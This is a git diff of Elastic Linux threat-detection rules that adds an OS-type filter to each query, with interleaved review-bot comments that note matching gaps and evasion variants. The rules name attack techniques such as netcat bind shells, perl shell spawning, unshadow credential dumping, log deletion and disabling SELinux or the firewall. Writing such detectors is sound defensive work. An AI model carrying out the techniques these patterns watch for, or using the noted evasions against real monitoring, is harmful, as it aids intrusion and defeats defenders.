diff --git a/rules/linux/command_and_control_connection_attempt_by_non_ssh_root_session.toml b/rules/linux/command_and_control_connection_attempt_by_non_ssh_root_session.toml
index f953beb12..824829a24 100644
--- a/rules/linux/command_and_control_connection_attempt_by_non_ssh_root_session.toml
+++ b/rules/linux/command_and_control_connection_attempt_by_non_ssh_root_session.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -45,9 +45,9 @@ type = "eql"
 query = '''
 sequence by process.entity_id with maxspan=1m
-[network where event.type == "start" and event.action == "connection_attempted" and user.id == "0" and
+[network where host.os.type == "linux" and event.type == "start" and event.action == "connection_attempted" and user.id == "0" and
 not process.executable : ("/bin/ssh", "/sbin/ssh", "/usr/lib/systemd/systemd", "/usr/sbin/sshd")]
-[process where event.action == "session_id_change" and user.id == "0" and
+[process where host.os.type == "linux" and event.action == "session_id_change" and user.id == "0" and
 not process.executable : ("/bin/ssh", "/sbin/ssh", "/usr/lib/systemd/systemd", "/usr/sbin/sshd")]
 '''
diff --git a/rules/linux/command_and_control_linux_iodine_activity.toml b/rules/linux/command_and_control_linux_iodine_activity.toml
index 5295985b0..52cdcb741 100644
--- a/rules/linux/command_and_control_linux_iodine_activity.toml
+++ b/rules/linux/command_and_control_linux_iodine_activity.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/19"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
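Review bot: The exclusion tuples on the two unchanged `not process.executable : (...)` lines list `/bin/ssh` and `/sbin/ssh` but not `/usr/bin/ssh`, which is the client path the SSH-backdoor rule later in this diff matches on (`process.executable : ("/usr/sbin/sshd", "/usr/bin/ssh")`); if the endpoint reports the resolved path on a merged-/usr host, root's own outbound SSH satisfies both stages and fires this sequence. Adding it to both tuples, `not process.executable : ("/bin/ssh", "/sbin/ssh", "/usr/bin/ssh", "/usr/lib/systemd/systemd", "/usr/sbin/sshd")`, keeps the two rules consistent. Separately, `host.os.type == "linux"` is now a hard predicate on every event in both stages, so an agent that leaves that field unset drops out of the rule silently rather than loudly; worth confirming the field is populated across the agent versions `min_stack_version = "8.3.0"` still admits.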
@@ -32,7 +32,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and event.type:(start or process_started) and process.name:(iodine or iodined)
+event.category:process and host.os.type:linux and event.type:(start or process_started) and process.name:(iodine or iodined)
 '''
diff --git a/rules/linux/command_and_control_tunneling_via_earthworm.toml b/rules/linux/command_and_control_tunneling_via_earthworm.toml
index 1e77040e6..683f35768 100644
--- a/rules/linux/command_and_control_tunneling_via_earthworm.toml
+++ b/rules/linux/command_and_control_tunneling_via_earthworm.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -34,7 +34,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "linux" and event.type == "start" and
 process.args : "-s" and process.args : "-d" and process.args : "rssocks"
 '''
diff --git a/rules/linux/credential_access_bruteforce_password_guessing.toml b/rules/linux/credential_access_bruteforce_password_guessing.toml
index 650ff7723..ad0e3842e 100644
--- a/rules/linux/credential_access_bruteforce_password_guessing.toml
+++ b/rules/linux/credential_access_bruteforce_password_guessing.toml
@@ -4,7 +4,7 @@ integration = ["system"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/01"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -54,10 +54,10 @@ tags = ["Elastic", "Host", "Linux", "Threat Detection", "Credential Access"]
 type = "eql"
 query = '''
 sequence by host.id, source.ip, user.name with maxspan=3s
- [authentication where event.action in ("ssh_login", "user_login") and
+ [authentication where host.os.type == "linux" and event.action in ("ssh_login", "user_login") and
 event.outcome == "failure" and source.ip != null and source.ip != "0.0.0.0" and source.ip != "::" ] with runs=2
- [authentication where event.action in ("ssh_login", "user_login") and
+ [authentication where host.os.type == "linux" and event.action in ("ssh_login", "user_login") and
 event.outcome == "success" and source.ip != null and source.ip != "0.0.0.0" and source.ip != "::" ]
 '''
diff --git a/rules/linux/credential_access_collection_sensitive_files.toml b/rules/linux/credential_access_collection_sensitive_files.toml
index d1d38b33a..0d512ee7f 100644
--- a/rules/linux/credential_access_collection_sensitive_files.toml
+++ b/rules/linux/credential_access_collection_sensitive_files.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -28,7 +28,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and event.type:start and
+event.category:process and host.os.type:linux and event.type:start and
 process.name:(zip or tar or gzip or hdiutil or 7z) and
 process.args:
 (
diff --git a/rules/linux/credential_access_credential_dumping.toml b/rules/linux/credential_access_credential_dumping.toml
index 87e80fb88..d795d5d6b 100644
--- a/rules/linux/credential_access_credential_dumping.toml
+++ b/rules/linux/credential_access_credential_dumping.toml
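Review bot: Both `authentication` stages now require `host.os.type == "linux"`, and this rule's events come from the `system` integration (`integration = ["system"]` in the metadata hunk above) rather than the endpoint, so if that pipeline leaves `host.os.type` unset on some agents the sequence stops matching with no error or alert. The dependency deserves a line in the rule's own documentation, e.g. a `setup` note such as `host.os.type must be populated on system.auth events; confirm with a search for host.os.type:linux before relying on this rule`. The same caveat applies to the two SSH brute-force rules that follow in this diff.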
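Review bot: `hdiutil` in the unchanged `process.name:(zip or tar or gzip or hdiutil or 7z)` line is a macOS disk-image utility, so once the query is pinned to `host.os.type:linux` that term can never match and is dead weight. `process.name:(zip or tar or gzip or 7z)` states what the rule now does; if broader coverage is wanted, Linux compressors such as `bzip2`, `xz` or `zstd` are the candidates to add instead. The `process.args:` list the hunk ends on continues outside this hunk.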
@@ -31,7 +31,7 @@ tags = ["Elastic", "Elastic Endgame", "Host", "Linux", "Threat Detection", "Cred
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where process.name == "unshadow" and
+process where host.os.type == "linux" and process.name == "unshadow" and
 event.type == "start" and event.action == "exec" and process.args_count >= 2
 '''
diff --git a/rules/linux/credential_access_potential_linux_ssh_bruteforce.toml b/rules/linux/credential_access_potential_linux_ssh_bruteforce.toml
index cf8ad0e1f..d0fbf183b 100644
--- a/rules/linux/credential_access_potential_linux_ssh_bruteforce.toml
+++ b/rules/linux/credential_access_potential_linux_ssh_bruteforce.toml
@@ -4,7 +4,7 @@ integration = ["system"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/01"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -54,7 +54,7 @@ tags = ["Elastic", "Host", "Linux", "Threat Detection", "Credential Access"]
 type = "eql"
 query = '''
 sequence by host.id, source.ip, user.name with maxspan=10s
- [authentication where event.action in ("ssh_login", "user_login") and
+ [authentication where host.os.type == "linux" and event.action in ("ssh_login", "user_login") and
 event.outcome == "failure" and source.ip != null and source.ip != "0.0.0.0" and source.ip != "::" ] with runs=10
 '''
diff --git a/rules/linux/credential_access_potential_linux_ssh_bruteforce_root.toml b/rules/linux/credential_access_potential_linux_ssh_bruteforce_root.toml
index bf9d7931f..e0d797103 100644
--- a/rules/linux/credential_access_potential_linux_ssh_bruteforce_root.toml
+++ b/rules/linux/credential_access_potential_linux_ssh_bruteforce_root.toml
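Review bot: This section's only hunk rewrites the query, but there is no `updated_date` hunk for `credential_access_credential_dumping.toml`, whereas every other query change in this diff is paired with one; unless the file already reads `updated_date = "2023/02/22"`, its recorded revision date no longer reflects this change. A second hunk, `-updated_date = "<old>"` / `+updated_date = "2023/02/22"`, would bring it in line with the rest of the commit.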
@@ -4,7 +4,7 @@ integration = ["system"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/01"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -54,7 +54,7 @@ tags = ["Elastic", "Host", "Linux", "Threat Detection", "Lateral Movement", "Cre
 type = "eql"
 query = '''
 sequence by host.id, source.ip with maxspan=10s
- [authentication where event.action in ("ssh_login", "user_login") and
+ [authentication where host.os.type == "linux" and event.action in ("ssh_login", "user_login") and
 event.outcome == "failure" and source.ip != null and source.ip != "0.0.0.0" and source.ip != "::" and user.name in ("*root*" , "*admin*")] with runs=3
 '''
diff --git a/rules/linux/credential_access_ssh_backdoor_log.toml b/rules/linux/credential_access_ssh_backdoor_log.toml
index c234ca9f7..11f78c920 100644
--- a/rules/linux/credential_access_ssh_backdoor_log.toml
+++ b/rules/linux/credential_access_ssh_backdoor_log.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -35,7 +35,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-file where event.type == "change" and process.executable : ("/usr/sbin/sshd", "/usr/bin/ssh") and
+file where host.os.type == "linux" and event.type == "change" and process.executable : ("/usr/sbin/sshd", "/usr/bin/ssh") and
 (
 (file.name : (".*", "~*", "*~") and not file.name : (".cache", ".viminfo", ".bash_history")) or
 file.extension : ("in", "out", "ini", "h", "gz", "so", "sock", "sync", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9") or
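Review bot: `user.name in ("*root*" , "*admin*")` on the unchanged context line is a literal comparison — in EQL `in` does not expand wildcards, only `:` and `like` do — so unless this stack gives `in` wildcard semantics, the sequence fires only for an account literally named `*root*` or `*admin*` and the rule is effectively inert for its intended target. `user.name : ("*root*", "*admin*")` gives the pattern match the values are obviously written for; if an exact match was meant, `user.name in ("root", "admin")`. Either way this is a real detection gap that the OS-filter change leaves untouched and is worth fixing in the same pass.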
diff --git a/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml b/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml
index 98e5de2b4..c0e73e5b0 100644
--- a/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml
+++ b/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml
@@ -24,7 +24,7 @@ tags = ["Elastic", "Host", "Linux", "Threat Detection", "Defense Evasion"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and event.action == "exec" and
+process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and
 (
 /* disable FW */
 (
diff --git a/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml b/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml
index 2cca08b51..49ca2656b 100644
--- a/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml
+++ b/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -25,7 +25,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and event.type:(start or process_started) and
+event.category:process and host.os.type:linux and event.type:(start or process_started) and
 ((process.name:service and process.args:stop) or
 (process.name:chkconfig and process.args:off) or
 (process.name:systemctl and process.args:(disable or stop or kill)))
diff --git a/rules/linux/defense_evasion_base16_or_base32_encoding_or_decoding_activity.toml b/rules/linux/defense_evasion_base16_or_base32_encoding_or_decoding_activity.toml
index 3f9c6f11c..783c23e1d 100644
--- a/rules/linux/defense_evasion_base16_or_base32_encoding_or_decoding_activity.toml
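Review bot: The `defense_evasion_attempt_to_disable_iptables_or_firewall.toml` section carries a single hunk that rewrites the query but no `updated_date` hunk, while every other query change in this diff is paired with one; unless the file already reads `updated_date = "2023/02/22"`, its revision date is now stale. A `-updated_date = "<old>"` / `+updated_date = "2023/02/22"` hunk would keep the metadata honest. The `( /* disable FW */ (` expression the hunk ends on continues outside this hunk.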
+++ b/rules/linux/defense_evasion_base16_or_base32_encoding_or_decoding_activity.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -28,7 +28,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and event.type:(start or process_started) and
+event.category:process and host.os.type:linux and event.type:(start or process_started) and
 process.name:(base16 or base32 or base32plain or base32hex)
 '''
diff --git a/rules/linux/defense_evasion_chattr_immutable_file.toml b/rules/linux/defense_evasion_chattr_immutable_file.toml
index 916452cb0..7e8ea0e16 100644
--- a/rules/linux/defense_evasion_chattr_immutable_file.toml
+++ b/rules/linux/defense_evasion_chattr_immutable_file.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -32,7 +32,9 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and user.name == "root" and process.executable : "/usr/bin/chattr" and process.args : ("-*i*", "+*i*") and not process.parent.executable: "/lib/systemd/systemd"
+process where host.os.type == "linux" and event.type == "start" and user.name == "root" and process.executable : "/usr/bin/chattr" and process.args : ("-*i*", "+*i*") and not process.parent.executable: "/lib/systemd/systemd"
 '''
diff --git a/rules/linux/defense_evasion_disable_selinux_attempt.toml b/rules/linux/defense_evasion_disable_selinux_attempt.toml
index 249f59e72..ed3f1ae20 100644
--- a/rules/linux/defense_evasion_disable_selinux_attempt.toml
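Review bot: The parent exclusion in the rewritten chattr condition, `not process.parent.executable: "/lib/systemd/systemd"`, spells the systemd path differently from the first rule in this diff, which excludes `/usr/lib/systemd/systemd`; on merged-/usr hosts `/lib` is a symlink into `/usr/lib`, so depending on which spelling the endpoint reports, one of the two rules either silently loses its systemd exclusion or never applies it. Listing both, `not process.parent.executable : ("/lib/systemd/systemd", "/usr/lib/systemd/systemd")`, removes the dependence on path canonicalisation. The `user.name == "root"` check is also a weaker form of the `user.id == "0"` used by the other root-scoped rules in this diff — a uid-0 account under another name (`toor`) slips past a name check.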
+++ b/rules/linux/defense_evasion_disable_selinux_attempt.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -26,7 +26,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and event.type:(start or process_started) and process.name:setenforce and process.args:0
+event.category:process and host.os.type:linux and event.type:(start or process_started) and process.name:setenforce and process.args:0
 '''
diff --git a/rules/linux/defense_evasion_file_deletion_via_shred.toml b/rules/linux/defense_evasion_file_deletion_via_shred.toml
index fe248183b..3bea31c1c 100644
--- a/rules/linux/defense_evasion_file_deletion_via_shred.toml
+++ b/rules/linux/defense_evasion_file_deletion_via_shred.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -26,7 +26,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and event.type:(start or process_started) and process.name:shred and
+event.category:process and host.os.type:linux and event.type:(start or process_started) and process.name:shred and
 process.args:("-u" or "--remove" or "-z" or "--zero")
 '''
diff --git a/rules/linux/defense_evasion_file_mod_writable_dir.toml b/rules/linux/defense_evasion_file_mod_writable_dir.toml
index afd1562ab..e2a48988f 100644
--- a/rules/linux/defense_evasion_file_mod_writable_dir.toml
+++ b/rules/linux/defense_evasion_file_mod_writable_dir.toml
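Review bot: `process.args:0` in the SELinux rule catches only `setenforce 0`; `setenforce Permissive` puts SELinux into the same permissive mode (the binary accepts `Enforcing|Permissive|1|0`, case-insensitively) and is not matched, so the most obvious variant of the technique walks past the rule. `process.args:(0 or Permissive or permissive)` closes that gap; the hunk only adds the OS filter and leaves the argument check as it was.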
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -31,7 +31,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and event.type:(start or process_started) and
+event.category:process and host.os.type:linux and event.type:(start or process_started) and
 process.name:(chmod or chown or chattr or chgrp) and
 process.working_directory:(/tmp or /var/tmp or /dev/shm) and
 not user.name:root
diff --git a/rules/linux/defense_evasion_hidden_file_dir_tmp.toml b/rules/linux/defense_evasion_hidden_file_dir_tmp.toml
index 22b85beb7..e26d2f500 100644
--- a/rules/linux/defense_evasion_hidden_file_dir_tmp.toml
+++ b/rules/linux/defense_evasion_hidden_file_dir_tmp.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -37,7 +37,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type in ("start", "process_started") and
+process where host.os.type == "linux" and event.type in ("start", "process_started") and
 process.working_directory in ("/tmp", "/var/tmp", "/dev/shm") and
 process.args regex~ """\.[a-z0-9_\-][a-z0-9_\-\.]{1,254}""" and
 not process.name in ("ls", "find", "grep")
diff --git a/rules/linux/defense_evasion_hidden_shared_object.toml b/rules/linux/defense_evasion_hidden_shared_object.toml
index 1619d489f..383e2e322 100644
--- a/rules/linux/defense_evasion_hidden_shared_object.toml
+++ b/rules/linux/defense_evasion_hidden_shared_object.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -31,7 +31,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-file where event.type : "creation" and file.extension == "so" and file.name : ".*.so"
+file where host.os.type == "linux" and event.type == "creation" and file.extension == "so" and file.name : ".*.so"
 '''
diff --git a/rules/linux/defense_evasion_kernel_module_removal.toml b/rules/linux/defense_evasion_kernel_module_removal.toml
index 69ce7613c..fe176fc44 100644
--- a/rules/linux/defense_evasion_kernel_module_removal.toml
+++ b/rules/linux/defense_evasion_kernel_module_removal.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -33,7 +33,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and event.type:(start or process_started) and
+event.category:process and host.os.type:linux and event.type:(start or process_started) and
 process.args:((rmmod and sudo) or (modprobe and sudo and ("--remove" or "-r")))
 '''
diff --git a/rules/linux/defense_evasion_log_files_deleted.toml b/rules/linux/defense_evasion_log_files_deleted.toml
index 13129f267..04610acf7 100644
--- a/rules/linux/defense_evasion_log_files_deleted.toml
+++ b/rules/linux/defense_evasion_log_files_deleted.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
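Review bot: In the kernel-module-removal rule, `process.args:((rmmod and sudo) or (modprobe and sudo and ("--remove" or "-r")))` requires the literal `sudo` in the argument list, so `rmmod x` or `modprobe -r x` run directly from a root shell, via `su`/`doas`, or from a cron job never matches — the rule detects the sudo wrapper rather than module removal itself. Matching on the tool, `process.name:rmmod or (process.name:modprobe and process.args:("--remove" or "-r"))`, optionally scoped with `user.id:0` to limit noise, covers the non-sudo path as well (the child spawned by sudo still matches). The kernel-module-enumeration rule that follows has the same `sudo` coupling.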
@@ -32,7 +32,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-file where event.type == "deletion" and
+file where host.os.type == "linux" and event.type == "deletion" and
 file.path :
 (
 "/var/run/utmp",
diff --git a/rules/linux/discovery_kernel_module_enumeration.toml b/rules/linux/discovery_kernel_module_enumeration.toml
index 7c9eef621..4324996a4 100644
--- a/rules/linux/discovery_kernel_module_enumeration.toml
+++ b/rules/linux/discovery_kernel_module_enumeration.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -32,7 +32,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and event.type:(start or process_started) and
+event.category:process and host.os.type:linux and event.type:(start or process_started) and
 process.args:(kmod and list and sudo or sudo and (depmod or lsmod or modinfo))
 '''
diff --git a/rules/linux/discovery_linux_hping_activity.toml b/rules/linux/discovery_linux_hping_activity.toml
index 7b7521c28..2287687cd 100644
--- a/rules/linux/discovery_linux_hping_activity.toml
+++ b/rules/linux/discovery_linux_hping_activity.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -32,7 +32,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and event.type:(start or process_started) and process.name:(hping or hping2 or hping3)
+event.category:process and host.os.type:linux and event.type:(start or process_started) and process.name:(hping or hping2 or hping3)
 '''
diff --git a/rules/linux/discovery_linux_nping_activity.toml b/rules/linux/discovery_linux_nping_activity.toml
index 98d731e82..501d93685 100644
--- a/rules/linux/discovery_linux_nping_activity.toml
+++ b/rules/linux/discovery_linux_nping_activity.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -32,7 +32,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and event.type:(start or process_started) and process.name:nping
+event.category:process and host.os.type:linux and event.type:(start or process_started) and process.name:nping
 '''
diff --git a/rules/linux/discovery_virtual_machine_fingerprinting.toml b/rules/linux/discovery_virtual_machine_fingerprinting.toml
index e0c221291..faa8bb43d 100644
--- a/rules/linux/discovery_virtual_machine_fingerprinting.toml
+++ b/rules/linux/discovery_virtual_machine_fingerprinting.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -32,7 +32,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and event.type:(start or process_started) and
+event.category:process and host.os.type:linux and event.type:(start or process_started) and
 process.args:("/sys/class/dmi/id/bios_version" or
 "/sys/class/dmi/id/product_name" or
 "/sys/class/dmi/id/chassis_vendor" or
diff --git a/rules/linux/execution_abnormal_process_id_file_created.toml b/rules/linux/execution_abnormal_process_id_file_created.toml
index b067db9a5..9a4129e55 100644
--- a/rules/linux/execution_abnormal_process_id_file_created.toml
+++ b/rules/linux/execution_abnormal_process_id_file_created.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -80,7 +80,7 @@ type = "eql"
 query = '''
 /* add file size filters when data is available */
-file where event.type == "creation" and user.id == "0" and
+file where host.os.type == "linux" and event.type == "creation" and user.id == "0" and
 file.path regex~ """/var/run/\w+\.(pid|lock|reboot)""" and
 file.extension in ("pid","lock","reboot") and
 /* handle common legitimate files */
diff --git a/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml b/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml
index e53426a10..42bfba2ae 100644
--- a/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml
+++ b/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/19"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -79,7 +79,7 @@ type = "eql"
 query = '''
 sequence by process.entity_id
- [process where event.type == "start" and
+ [process where host.os.type == "linux" and event.type == "start" and
 process.name:("nc","ncat","netcat","netcat.openbsd","netcat.traditional") and (
 /* bind shell to echo for command execution */
 (process.args:("-l","-p") and process.args:("-c","echo","$*"))
@@ -92,7 +92,7 @@ sequence by process.entity_id
 /* file transfer via pipe */
 or (process.args:("|") and process.args:("nc","ncat")) )]
- [network where (process.name == "nc" or process.name == "ncat" or process.name == "netcat" or
+ [network where host.os.type == "linux" and (process.name == "nc" or process.name == "ncat" or process.name == "netcat" or
 process.name == "netcat.openbsd" or process.name == "netcat.traditional")]
 '''
diff --git a/rules/linux/execution_perl_tty_shell.toml b/rules/linux/execution_perl_tty_shell.toml
index 84e761a4f..9bb038d4c 100644
--- a/rules/linux/execution_perl_tty_shell.toml
+++ b/rules/linux/execution_perl_tty_shell.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -25,7 +25,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and event.type:(start or process_started) and process.name:perl and
+event.category:process and host.os.type:linux and event.type:(start or process_started) and process.name:perl and
 process.args:("exec \"/bin/sh\";" or "exec \"/bin/dash\";" or "exec \"/bin/bash\";")
 '''
diff --git a/rules/linux/execution_process_started_from_process_id_file.toml b/rules/linux/execution_process_started_from_process_id_file.toml
index 91afb7474..660b9bc2f 100644
--- a/rules/linux/execution_process_started_from_process_id_file.toml
+++ b/rules/linux/execution_process_started_from_process_id_file.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
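Review bot: In the perl TTY-shell rule, `process.args:("exec \"/bin/sh\";" or "exec \"/bin/dash\";" or "exec \"/bin/bash\";")` is an exact match on one argv entry, so trivial rewrites of the one-liner — single quotes (`exec '/bin/sh'`), no trailing semicolon, a leading space, `/usr/bin/bash`, or `system("/bin/sh")` — all evade it; the rule only sees the textbook form. A wildcard form such as `process.args:*exec*/bin/*sh*` survives quoting changes at some false-positive cost and is worth considering now that the rule is explicitly Linux-only. The hunk itself leaves this line unchanged.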
@@ -46,7 +46,8 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and user.id == "0" and process.executable regex~ """/var/run/\w+\.(pid|lock|reboot)"""
+process where host.os.type == "linux" and event.type == "start" and user.id == "0" and process.executable regex~ """/var/run/\w+\.(pid|lock|reboot)"""
 '''
diff --git a/rules/linux/execution_process_started_in_shared_memory_directory.toml b/rules/linux/execution_process_started_in_shared_memory_directory.toml
index 32beb52ab..5183bae40 100644
--- a/rules/linux/execution_process_started_in_shared_memory_directory.toml
+++ b/rules/linux/execution_process_started_in_shared_memory_directory.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -38,7 +38,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "linux" and event.type == "start" and
 event.action : ("exec", "exec_event") and user.name == "root" and process.executable : ( "/dev/shm/*",
diff --git a/rules/linux/execution_python_tty_shell.toml b/rules/linux/execution_python_tty_shell.toml
index 7dafdaba3..4ec571c7d 100644
--- a/rules/linux/execution_python_tty_shell.toml
